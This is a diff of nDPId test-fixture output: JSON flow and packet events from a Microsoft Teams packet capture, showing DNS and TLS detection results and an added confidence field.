+01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00866{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1587041683142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1587041683142,"pkt":"EBMx8Tl2KDc3AG3ICABFAABOVgkAAP8R4j3AqAEGwKgBAeCgADUAOmwyTTEBAAABAAAAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1587041683184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1587041683184,"pkt":"KDc3AG3IEBMx8Tl2CABFAADQTcNAADkRcALAqAEBwKgBBgA14KAAvAAATTGBgAABAAMAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAHADAAFAAEAAAAMACoVdGVhbXMtY2hhdHN2Y2FnZy1wcm9kDnRyYWZmaWNtYW5hZ2VyA25ldADAPgAFAAEAAAEsADAWbXNnLXVrc28tMDEtY2hhdHN2Y2FnZwd1a3NvdXRoCGNsb3VkYXBwBWF6dXJlwCnAdAABAAEAAAAFAAQ0clg7"}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041683406,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
-01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
-00843{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01495{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00869{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041683611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1587041684291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1587041684291,"pkt":"EBMx8Tl2KDc3AG3ICABFAABC19sAAP8RYHfAqAEGwKgBAegLADUALnZLN+4BAAABAAAAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1587041684304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1587041684304,"pkt":"KDc3AG3IEBMx8Tl2CABFAADIzNlAADkR8PPAqAEBwKgBBgA16AsAtAAAN+6BgAABAAUAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAHADAAFAAEAAABCABQJc3Vic3RyYXRlB21zLWFjZGPAFsAyAAUAAQAAABYACAVhZmQta8AWwFIABQABAAAAGQAoEm91dGxvb2stb2ZmaWNlLWNvbQZrLTAwMDIIay1tc2VkZ2UDbmV0AMBmAAUAAQAAAKAAAsB5wHkAAQABAAAAoQAEDWsSCw=="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"}
